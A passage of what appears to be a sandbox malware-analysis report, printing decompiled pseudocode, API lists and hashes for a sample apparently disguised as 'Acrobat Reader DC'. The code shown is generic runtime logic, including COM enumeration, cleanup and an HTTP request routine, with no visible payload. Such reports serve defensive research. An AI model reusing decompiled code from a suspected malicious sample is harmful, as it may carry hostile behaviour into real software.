                                  						InterlockedIncrement(0x4a7f04);
                                  						_t133 =  *0x4a7f04; // 0x0
                                  						_t262 = _t262 - 1;
                                  						__eflags = _t133 - 1;
                                  						if(_t133 != 1) {
                                  							continue;
                                  						}
                                  						goto L8;
                                  					}
                                  					__eflags = _t133 - 1;
                                  					if(_t133 == 1) {
                                  						goto L8;
                                  					}
                                  					goto L12;
                                  				}
                                  				L1:
                                  				return 0;
                                  			}


                                  APIs
                                  • InterlockedIncrement.KERNEL32(004A7F04), ref: 0042C659
                                  • InterlockedDecrement.KERNEL32(004A7F04), ref: 0042C677
                                  • Sleep.KERNEL32(0000000A), ref: 0042C67F
                                  • InterlockedIncrement.KERNEL32(004A7F04), ref: 0042C68A
                                  • InterlockedDecrement.KERNEL32(004A7F04), ref: 0042C73C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Interlocked$DecrementIncrement$Sleep
                                  • String ID: @COM_EVENTOBJ
                                  • API String ID: 327565842-2228938565
                                  • Opcode ID: 70307c3fe60be0ab36e309062113007dfb865a7b1b1bb36a34d2cd10d052add5
                                  • Instruction ID: 079f2a2c733a9a3e151bbe14bd9981fb61a061d6167fc58a91b905d371dd4d86
                                  • Opcode Fuzzy Hash: 70307c3fe60be0ab36e309062113007dfb865a7b1b1bb36a34d2cd10d052add5
                                  • Instruction Fuzzy Hash: 18D1D271A002198FDB10EF94C985BEEB7B0FF45304F60856AE5057B392D778AE46CB98
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 21%
                                  			E0046C84C(intOrPtr _a4, void* _a8, char _a12, intOrPtr _a16) {
                                  				char* _v8;
                                  				char* _v12;
                                  				intOrPtr _v16;
                                  				char _v20;
                                  				intOrPtr _v24;
                                  				intOrPtr _v28;
                                  				intOrPtr _v32;
                                  				char _v36;
                                  				intOrPtr* _v40;
                                  				intOrPtr* _v44;
                                  				intOrPtr* _v48;
                                  				char _v52;
                                  				char _v68;
                                  				void* _v76;
                                  				char _v84;
                                  				intOrPtr* _v92;
                                  				char _v100;
                                  				char _v132;
                                  				void* __edi;
                                  				void* __esi;
                                  				short* _t76;
                                  				intOrPtr _t89;
                                  				intOrPtr* _t92;
                                  				char _t95;
                                  				intOrPtr* _t100;
                                  				intOrPtr* _t102;
                                  				intOrPtr _t104;
                                  				intOrPtr* _t106;
                                  				intOrPtr* _t155;
                                  				intOrPtr* _t156;
                                  				intOrPtr* _t157;
                                  				intOrPtr* _t158;
                                  				intOrPtr* _t159;
                                  				intOrPtr* _t160;
                                  				intOrPtr* _t161;
                                  				intOrPtr* _t162;
                                  
                                  				_t162 = _a12;
                                  				_t155 = _a8;
                                  				_a8 = 0;
                                  				_v8 = L"_NewEnum";
                                  				_v12 = L"get__NewEnum";
                                  				_v52 = 0;
                                  				_v48 = 0;
                                  				_v44 = 0;
                                  				_v40 = 0;
                                  				_v36 = 0x20404;
                                  				_v32 = 0;
                                  				_v28 = 0xc0;
                                  				_v24 = 0x46000000;
                                  				E00412F40( &_v132, 0, 0x20);
                                  				if(_t155 == 0 || _a16 == 0 || _t162 == 0) {
                                  					L34:
                                  					_push(1);
                                  					_push(L"Null Object assignment in FOR..IN loop");
                                  					goto L35;
                                  				} else {
                                  					if(E00432416(_t162) != 0) {
                                  						L21:
                                  						_t76 =  *_t162;
                                  						__eflags = _t76;
                                  						if(_t76 != 0) {
                                  							__eflags =  *_t76 - 0xd;
                                  							if( *_t76 == 0xd) {
                                  								_t156 =  *((intOrPtr*)(_t76 + 8));
                                  								__imp__#8( &_v68);
                                  								__imp__#9( &_v68);
                                  								_t157 =  *((intOrPtr*)( *((intOrPtr*)( *_t156 + 0xc))))(_t156, 1,  &_v68,  &_a8);
                                  								__eflags = _t157;
                                  								if(_t157 >= 0) {
                                  									L29:
                                  									__eflags = _a8;
                                  									if(_a8 == 0) {
                                  										L32:
                                  										_v68 = 1;
                                  										E00408F40(_t157, _t162);
                                  										 *((intOrPtr*)(_t162 + 8)) = 1;
                                  										 *_t162 = 0;
                                  										_push( &_v68);
                                  									} else {
                                  										__eflags = _t157 - 1;
                                  										if(_t157 == 1) {
                                  											goto L32;
                                  										} else {
                                  											_push( &_v68);
                                  										}
                                  									}
                                  									E00468070(_a16);
                                  									__imp__#9( &_v68);
                                  									__eflags = 0;
                                  									return 0;
                                  								} else {
                                  									__eflags = _t157 - 1;
                                  									if(_t157 == 1) {
                                  										goto L29;
                                  									} else {
                                  										E00408F40(_t157, _t162);
                                  										 *((intOrPtr*)(_t162 + 8)) = 1;
                                  										 *_t162 = 0;
                                  										return E00451B42(_a4, _t157, 0, 0, 1);
                                  									}
                                  								}
                                  							} else {
                                  								_push(1);
                                  								_push(L"Incorrect Object type in FOR..IN loop");
                                  								L35:
                                  								_push(0);
                                  								_push(1);
                                  								_push(_a4);
                                  								return E00451B42();
                                  							}
                                  						} else {
                                  							return E00451B42(_a4, 1, 0, L"Null Object assignment in FOR..IN loop", 1);
                                  						}
                                  					} else {
                                  						_t89 =  *_t155;
                                  						if(_t89 == 0 ||  *((intOrPtr*)(_t155 + 8)) != 8) {
                                  							return E00451B42(_a4, 2, 0, L"Null Object assignment in FOR..IN loop", 1);
                                  						} else {
                                  							_t158 =  *((intOrPtr*)(_t89 + 8));
                                  							if(_t158 != 0) {
                                  								_t92 =  *((intOrPtr*)( *((intOrPtr*)( *_t158 + 0x14))))(_t158, 0x482a18,  &_v8, 1, 0x400,  &_a12);
                                  								__eflags = _t92;
                                  								if(_t92 < 0) {
                                  									L10:
                                  									__eflags =  *((intOrPtr*)( *((intOrPtr*)( *_t158 + 0x14))))(_t158, 0x482a18,  &_v12, 1, 0x400,  &_a12);
                                  									if(__eflags < 0) {
                                  										L12:
                                  										_a12 = 0xfffffffc;
                                  									} else {
                                  										__eflags = _a12 - 0xffffffff;
                                  										if(__eflags == 0) {
                                  											goto L12;
                                  										}
                                  									}
                                  								} else {
                                  									__eflags = _a12 - 0xffffffff;
                                  									if(__eflags == 0) {
                                  										goto L10;
                                  									}
                                  								}
                                  								_t95 = E00410E53(_t158, _t162, __eflags);
                                  								_v16 = _t95;
                                  								_v52 = _t95;
                                  								_v44 = 0;
                                  								__imp__#8( &_v100, 0x10);
                                  								_t100 =  *((intOrPtr*)( *((intOrPtr*)( *_t158 + 0x18))))(_t158, _a12, 0x482a18, 0x800, 3,  &_v52,  &_v100,  &_v132,  &_v20);
                                  								_push(_v16);
                                  								_t159 = _t100;
                                  								E0041351D();
                                  								__eflags = _t159;
                                  								if(_t159 >= 0) {
                                  									_t102 = _v92;
                                  									__eflags = _t102;
                                  									if(_t102 == 0) {
                                  										goto L34;
                                  									} else {
                                  										_v84 = 0xd;
                                  										_t160 = _t102;
                                  										_t104 =  *((intOrPtr*)( *((intOrPtr*)( *_t102))))(_t102,  &_v36,  &_v76);
                                  										_v16 = _t104;
                                  										 *((intOrPtr*)( *((intOrPtr*)( *_t160 + 8))))(_t160);
                                  										_t106 = _v76;
                                  										_t161 = _t106;
                                  										__eflags = _t106;
                                  										if(_t106 != 0) {
                                  											 *((intOrPtr*)( *((intOrPtr*)( *_t106 + 0x14))))(_t106);
                                  											E00468070(_t162,  &_v84);
                                  											 *((intOrPtr*)( *((intOrPtr*)( *_t161 + 8))))(_t161);
                                  											goto L21;
                                  										} else {
                                  											return E00451B42(_a4, _v16, 0, 0, 1);
                                  										}
                                  									}
                                  								} else {
                                  									_push(1);
                                  									_push(0);
                                  									__eflags = _t159 - 0x80020009;
                                  									if(_t159 != 0x80020009) {
                                  										_push(0);
                                  										_push(_t159);
                                  										_push(_a4);
                                  										return E00451B42();
                                  									} else {
                                  										_push( &_v132);
                                  										_push(_t159);
                                  										_push(_a4);
                                  										return E00451B42();
                                  									}
                                  								}
                                  							} else {
                                  								return E00451B42(_a4, 2, 0, L"Null Object assignment in FOR..IN loop", 1);
                                  							}
                                  						}
                                  					}
                                  				}
                                  			}

                                  APIs
                                  • _memset.LIBCMT ref: 0046C89E
                                  • VariantInit.OLEAUT32(?), ref: 0046C96E
                                    • Part of subcall function 00451B42: GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                                    • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                                    • Part of subcall function 00451B42: VariantCopy.OLEAUT32(-00000068,?), ref: 00451C0E
                                    • Part of subcall function 00451B42: VariantCopy.OLEAUT32(-00000088,?), ref: 00451C27
                                    • Part of subcall function 00451B42: VariantClear.OLEAUT32(-00000058), ref: 00451CA1
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Variant$Copy$ClearErrorInitLast_memset
                                  • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                  • API String ID: 530611519-625585964
                                  • Opcode ID: ca4782e3f1b8c357821c68e66e95b499971d8adc7301cf0feb6afda3dd37ffd4
                                  • Instruction ID: 684ba17e2c3ca727561f7970afa8535519679aefa5cdc663b381c32651820a10
                                  • Opcode Fuzzy Hash: ca4782e3f1b8c357821c68e66e95b499971d8adc7301cf0feb6afda3dd37ffd4
                                  • Instruction Fuzzy Hash: F6A19472600209ABDB10DF99DCC1EFEB3B9FB84714F10852EF604A7281E7B59D458BA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 80%
                                  			E00401CB0(intOrPtr __ecx) {
                                  				intOrPtr _v8;
                                  				long _v12;
                                  				long* _v16;
                                  				void* __ebx;
                                  				void* __edi;
                                  				void* __esi;
                                  				intOrPtr* _t97;
                                  				struct HWND__* _t100;
                                  				int** _t103;
                                  				intOrPtr* _t104;
                                  				struct HINSTANCE__** _t105;
                                  				intOrPtr* _t106;
                                  				void* _t119;
                                  				void* _t124;
                                  				void* _t126;
                                  				void* _t129;
                                  				void* _t131;
                                  				intOrPtr* _t159;
                                  				signed int _t173;
                                  				long* _t174;
                                  				intOrPtr _t203;
                                  				intOrPtr _t205;
                                  				signed int _t207;
                                  				signed int _t208;
                                  				signed int _t209;
                                  				long* _t210;
                                  				intOrPtr* _t212;
                                  				intOrPtr* _t217;
                                  				intOrPtr* _t219;
                                  				intOrPtr* _t220;
                                  				intOrPtr* _t221;
                                  				intOrPtr* _t222;
                                  				intOrPtr _t225;
                                  				void* _t226;
                                  
                                  				_t205 = __ecx;
                                  				_t97 = __ecx - 0x49c;
                                  				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(__ecx - 0x49c)) + 4)) + __ecx - 0x49c)) = "bZB";
                                  				_v12 = _t97;
                                  				 *((intOrPtr*)( *((intOrPtr*)( *_t97 + 4)) + __ecx - 0x4a0)) =  *((intOrPtr*)( *_t97 + 4)) - 0x49c;
                                  				_t100 =  *(__ecx - 0x3b4);
                                  				_v8 = __ecx;
                                  				if(_t100 != 0) {
                                  					DestroyWindow(_t100);
                                  				}
                                  				mciSendStringW(L"close all", 0, 0, 0);
                                  				if( *((intOrPtr*)(_t205 - 0x2ec)) > 0) {
                                  					_t207 = 0;
                                  					do {
                                  						_t103 =  *( *((intOrPtr*)(_t205 - 0x2f0)) + _t207 * 4);
                                  						if( *_t103 != 0) {
                                  							UnregisterHotKey( *0x497518,  *( *_t103));
                                  							_t171 =  *( *( *((intOrPtr*)(_t205 - 0x2f0)) + _t207 * 4));
                                  							if( *( *( *((intOrPtr*)(_t205 - 0x2f0)) + _t207 * 4)) != 0) {
                                  								E00442B97(_t171);
                                  							}
                                  						}
                                  						_t207 = _t207 + 1;
                                  					} while (_t207 <  *((intOrPtr*)(_t205 - 0x2ec)));
                                  					goto L2;
                                  				} else {
                                  					L2:
                                  					if( *((intOrPtr*)(_t205 - 0x31c)) > 0) {
                                  						_t173 = 0;
                                  						do {
                                  							_t104 =  *((intOrPtr*)( *((intOrPtr*)(_t205 - 0x320)) + _t173 * 4));
                                  							if( *_t104 != 0) {
                                  								_t159 =  *_t104;
                                  								if( *_t159 != 0) {
                                  									FindClose( *(_t159 + 8));
                                  									_push( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t205 - 0x320)) + _t173 * 4)))) + 0xc)));
                                  									E004111DC();
                                  									_t226 = _t226 + 4;
                                  								} else {
                                  									_t225 =  *((intOrPtr*)(_t159 + 4));
                                  									E0040DA20(_t225);
                                  									 *((intOrPtr*)(_t225 + 0x2c)) = 0;
                                  									 *((intOrPtr*)(_t225 + 0x30)) = 0;
                                  								}
                                  								_t203 =  *((intOrPtr*)(_t205 - 0x320));
                                  								_t183 =  *((intOrPtr*)( *((intOrPtr*)(_t203 + _t173 * 4))));
                                  								_push( *((intOrPtr*)( *((intOrPtr*)(_t203 + _t173 * 4)))));
                                  								E004111DC();
                                  								_t226 = _t226 + 4;
                                  							}
                                  							_t173 = _t173 + 1;
                                  						} while (_t173 <  *((intOrPtr*)(_t205 - 0x31c)));
                                  					}
                                  					if( *((intOrPtr*)(_t205 - 0x30c)) > 0) {
                                  						_t208 = 0;
                                  						do {
                                  							_t105 =  *( *((intOrPtr*)(_t205 - 0x310)) + _t208 * 4);
                                  							if( *_t105 != 0) {
                                  								FreeLibrary( *_t105);
                                  							}
                                  							_t208 = _t208 + 1;
                                  						} while (_t208 <  *((intOrPtr*)(_t205 - 0x30c)));
                                  					}
                                  					if( *((intOrPtr*)(_t205 - 0x2fc)) > 0) {
                                  						_t209 = 0;
                                  						do {
                                  							_t183 =  *((intOrPtr*)(_t205 - 0x300));
                                  							_t106 =  *((intOrPtr*)( *((intOrPtr*)(_t205 - 0x300)) + _t209 * 4));
                                  							if( *_t106 != 0) {
                                  								VirtualFree( *( *_t106 + 0x10), 0, 0x8000);
                                  								_t183 =  *((intOrPtr*)(_t205 - 0x300));
                                  								_t155 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t205 - 0x300)) + _t209 * 4))));
                                  								if( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t205 - 0x300)) + _t209 * 4)))) != 0) {
                                  									E0044AFD1(_t155);
                                  								}
                                  							}
                                  							_t209 = _t209 + 1;
                                  						} while (_t209 <  *((intOrPtr*)(_t205 - 0x2fc)));
                                  					}
                                  					_t210 = _t205 - 0x2e4;
                                  					_v16 = _t210;
                                  					E00408F40(_t205, _t210);
                                  					_t210[2] = 1;
                                  					 *_t210 = 0;
                                  					_t174 = _t205 - 0x14;
                                  					E00408F40(_t205, _t174);
                                  					_t212 = _v12;
                                  					_t174[2] = 1;
                                  					 *_t174 = 0;
                                  					_t111 =  *((intOrPtr*)( *_t212 + 4)) + _t205;
                                  					if( *((intOrPtr*)( *((intOrPtr*)( *_t212 + 4)) + _t205 - 0x498)) == 0) {
                                  						L8:
                                  						E0040E750(_t183, _t205, _t212);
                                  						_t113 =  *((intOrPtr*)(_t205 - 0x28));
                                  						if( *((intOrPtr*)(_t205 - 0x28)) != 0) {
                                  							E004326ED(_t113);
                                  						}
                                  						E00408F40(_t205, _t174);
                                  						E004109A0(_t205 - 0x34);
                                  						E004109C0(_t205 - 0x44);
                                  						E00402250(_t205 - 0x64);
                                  						_t119 = E00401400(_t205 - 0x1a0);
                                  						_t217 = _t205 - 0x1bc;
                                  						 *_t217 = 0x48ab10;
                                  						E004109E0(_t119, _t217);
                                  						_push( *((intOrPtr*)(_t217 + 4)));
                                  						E004111DC();
                                  						E004012F0(_t205 - 0x2c4, _t205);
                                  						E00402250(_t205 - 0x2d4);
                                  						_t124 = E00408F40(_t205, _v16);
                                  						_t219 = _t205 - 0x2f4;
                                  						 *_t219 = 0x48ab10;
                                  						E004109E0(_t124, _t219);
                                  						_push( *((intOrPtr*)(_t219 + 4)));
                                  						_t126 = E004111DC();
                                  						_t220 = _t205 - 0x304;
                                  						 *_t220 = 0x48ab10;
                                  						E004109E0(_t126, _t220);
                                  						_push( *((intOrPtr*)(_t220 + 4)));
                                  						_t129 = E004111DC();
                                  						_t221 = _t205 - 0x314;
                                  						 *_t221 = 0x48ab10;
                                  						E004109E0(_t129, _t221);
                                  						_push( *((intOrPtr*)(_t221 + 4)));
                                  						_t131 = E004111DC();
                                  						_t222 = _t205 - 0x324;
                                  						 *_t222 = 0x48ab10;
                                  						E004109E0(_t131, _t222);
                                  						_push( *((intOrPtr*)(_t222 + 4)));
                                  						E004111DC();
                                  						E00410AA0(_t205 - 0x330);
                                  						E00410A70(_t205 - 0x340, _t205 - 0x2c4);
                                  						E00402250(_t205 - 0x350);
                                  						E00410A40(_t205 - 0x368);
                                  						E004109C0(_t205 - 0x374);
                                  						E004109C0(_t205 - 0x380);
                                  						E00402250(_t205 - 0x3c4);
                                  						E00402250(_t205 - 0x3d4);
                                  						E00402250(_t205 - 0x3e4);
                                  						return E0040DDD0(_t205 - 0x414);
                                  					} else {
                                  						_v12 = 0;
                                  						do {
                                  							E0040D410( &_v12, _t111 - 0x49c);
                                  							E0040DA90(_t174, _t111 - 0x49c,  *((intOrPtr*)( *_t212 + 4)) + _t205 - 0x498);
                                  							_t183 =  *_t212;
                                  							_t111 = _v8 +  *((intOrPtr*)( *_t212 + 4));
                                  							_t205 = _v8;
                                  						} while ( *((intOrPtr*)(_v8 +  *((intOrPtr*)( *_t212 + 4)) - 0x498)) != 0);
                                  						goto L8;
                                  					}
                                  				}
                                  			}






































                                  APIs
                                  • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00401D06
                                  • DestroyWindow.USER32(?), ref: 00426F50
                                  • UnregisterHotKey.USER32(?), ref: 00426F77
                                  • FreeLibrary.KERNEL32(?), ref: 0042701F
                                  • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00427050
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Free$DestroyLibrarySendStringUnregisterVirtualWindow
                                  • String ID: close all
                                  • API String ID: 4174999648-3243417748
                                  • Opcode ID: 4052fa3676dac3e377c2eda6cd32e3dbff7831d3d551d493591d62a78ae4b3a8
                                  • Instruction ID: 89fc9d45334329c88beddca7a6314a06ce6e15860ee53b488cbf8147960762b2
                                  • Opcode Fuzzy Hash: 4052fa3676dac3e377c2eda6cd32e3dbff7831d3d551d493591d62a78ae4b3a8
                                  • Instruction Fuzzy Hash: 9BA1C174710212CFC710EF15C985B5AF3A8BF48304F5045AEE909672A2CB78BD96CF99
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 78%
                                  			E0044AA86(void** _a4, long _a8, long _a12, char _a16) {
                                  				intOrPtr _v8;
                                  				void* _v12;
                                  				void _v44;
                                  				void* _t43;
                                  				void* _t47;
                                  				void* _t54;
                                  				void* _t57;
                                  				void* _t65;
                                  				void* _t70;
                                  				void* _t87;
                                  				void** _t89;
                                  				long _t90;
                                  
                                  				_t90 = _a8;
                                  				_t89 = _a4;
                                  				_a8 = _t89[0x15];
                                  				if( *((intOrPtr*)(_t90 + 0x74)) == 4) {
                                  					_a8 = _a8 | 0x00800000;
                                  				}
                                  				_t43 = InternetConnectW(_t89[1],  *(_t90 + 0x10),  *(_t90 + 0x78) & 0x0000ffff,  *(_t90 + 0x20),  *(_t90 + 0x30),  *(_t90 + 0x70), 0, 0);
                                  				 *_t89 = _t43;
                                  				_push(0);
                                  				if(_t43 != 0) {
                                  					_t70 = HttpOpenRequestW(_t43, 0,  *(_t90 + 0x60), 0, 0, 0, _a8, ??);
                                  					_v12 = _t70;
                                  					_v8 = InternetCloseHandle;
                                  					if(_t70 != 0) {
                                  						if(_a12 != 0) {
                                  							E00442516(_t89, _t70, _t90);
                                  						}
                                  						if((_a8 & 0x00001000) != 0) {
                                  							_a8 = 4;
                                  							InternetQueryOptionW(_t70, 0x1f,  &_a12,  &_a8);
                                  							_a12 = _a12 | 0x00000100;
                                  							InternetSetOptionW(_t70, 0x1f,  &_a12, 4);
                                  						}
                                  						if(HttpSendRequestW(_t70, 0, 0, 0, 0) == 0 || E004318EB(_t70) != 0xc8) {
                                  							_t47 = E004422CB(_t89, 0xd, 0xdeadbeef, 0);
                                  							E00431861( &_v12);
                                  							return _t47;
                                  						} else {
                                  							_a12 = 0;
                                  							_a8 = 0x20;
                                  							HttpQueryInfoW(_t70, 5,  &_v44,  &_a8,  &_a12);
                                  							_t87 =  &_v44;
                                  							_t89[4] = E0041319B(_t87);
                                  							_t89[5] = _t87;
                                  							if(_a16 == 0) {
                                  								_t54 = E004422CB(_t89, 0, 0, 1);
                                  								E00431861( &_v12);
                                  								return _t54;
                                  							} else {
                                  								_t57 = E004424F3(_t89, _t70);
                                  								E00431861( &_v12);
                                  								return _t57;
                                  							}
                                  						}
                                  					} else {
                                  						_t65 = E004422CB(_t89, 0xc, 0xdeadbeef, _t70);
                                  						E00431861( &_v12);
                                  						return _t65;
                                  					}
                                  				} else {
                                  					_push(0xdeadbeef);
                                  					_push(0xb);
                                  					_push(_t89);
                                  					return E004422CB();
                                  				}
                                  			}

                                  APIs
                                  • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0044AAC5
                                  • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0044AAFA
                                  • InternetQueryOptionW.WININET(00000000,0000001F,00000000,00001000), ref: 0044AB5E
                                  • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0044AB74
                                  • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044AB83
                                  • HttpQueryInfoW.WININET(00000000,00000005,?,00001000,00000000), ref: 0044ABBB
                                    • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: HttpInternet$OptionQueryRequest$ConnectErrorInfoLastOpenSend
                                  • String ID:
                                  • API String ID: 1291720006-3916222277
                                  • Opcode ID: 91fdcc8e85295173cca015a6521aec32459a41892940df1d160b2f6c73229ea3
                                  • Instruction ID: 89538bfc19842651326e528327905a39262a83d8aa3acd63c003c629d13479a9
                                  • Opcode Fuzzy Hash: 91fdcc8e85295173cca015a6521aec32459a41892940df1d160b2f6c73229ea3
                                  • Instruction Fuzzy Hash: FA51B1756403087BF710DF56DC86FEBB7A8FB88715F00851EFB0196281D7B8A5148BA8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • SafeArrayAccessData.OLEAUT32(?,?), ref: 004352E6
                                  • VariantClear.OLEAUT32(?), ref: 00435320
                                  • SafeArrayUnaccessData.OLEAUT32(?), ref: 00435340
                                  • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00435373
                                  • VariantClear.OLEAUT32(?), ref: 004353B3
                                  • SafeArrayUnaccessData.OLEAUT32(?), ref: 004353F6
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: ArrayDataSafeVariant$ClearUnaccess$AccessChangeType
                                  • String ID: crts
                                  • API String ID: 586820018-3724388283
                                  • Opcode ID: 545d374044e3945891266c858ffc3b068b1e43ab9a1ba77500f3c10b34ab4cdf
                                  • Instruction ID: e94501f388d0d73ced66c0aa9444ce68fa972137b9c89e1913ae9ea64c05cbbc
                                  • Opcode Fuzzy Hash: 545d374044e3945891266c858ffc3b068b1e43ab9a1ba77500f3c10b34ab4cdf
                                  • Instruction Fuzzy Hash: DE418BB5200208EBDB10CF1CD884A9AB7B5FF9C314F20852AEE49CB351E775E911CBA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0044BBD2(void* __edx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, signed int _a12) {
                                  				long _v10;
                                  				long _v14;
                                  				long _v18;
                                  				struct _SHFILEOPSTRUCTW _v36;
                                  				short _v560;
                                  				short _v1084;
                                  				void* __ebx;
                                  				signed int _t45;
                                  				signed int _t47;
                                  				signed int _t48;
                                  				signed int _t50;
                                  				signed int _t56;
                                  				signed int _t63;
                                  				void* _t86;
                                  				void* _t87;
                                  				void* _t88;
                                  				void* _t89;
                                  				void* _t90;
                                  				void* _t91;
                                  
                                  				_t88 = _t87 - 0x438;
                                  				_t63 = _a12;
                                  				E00410120( &_v1084, _a4, __edx);
                                  				E00410120( &_v560, _a8, __edx);
                                  				if(lstrcmpiW( &_v1084,  &_v560) != 0) {
                                  					_t45 = E00433998( &_v1084);
                                  					_t89 = _t88 + 4;
                                  					__eflags = _t45;
                                  					if(_t45 == 0) {
                                  						goto L8;
                                  					} else {
                                  						_t47 = E00433998( &_v560);
                                  						_t90 = _t89 + 4;
                                  						__eflags = _t47;
                                  						if(__eflags == 0) {
                                  							_t48 = E004335CD(_t63, __edi, __esi, __eflags,  &_v560);
                                  							_t91 = _t90 + 4;
                                  							__eflags = _t48;
                                  							if(_t48 == 0) {
                                  								goto L8;
                                  							} else {
                                  								_t50 = E00433998( &_v560);
                                  								_t90 = _t91 + 4;
                                  								__eflags = _t50;
                                  								if(_t50 == 0) {
                                  									goto L8;
                                  								} else {
                                  									goto L11;
                                  								}
                                  							}
                                  						} else {
                                  							__eflags = _t63;
                                  							if(_t63 != 0) {
                                  								L11:
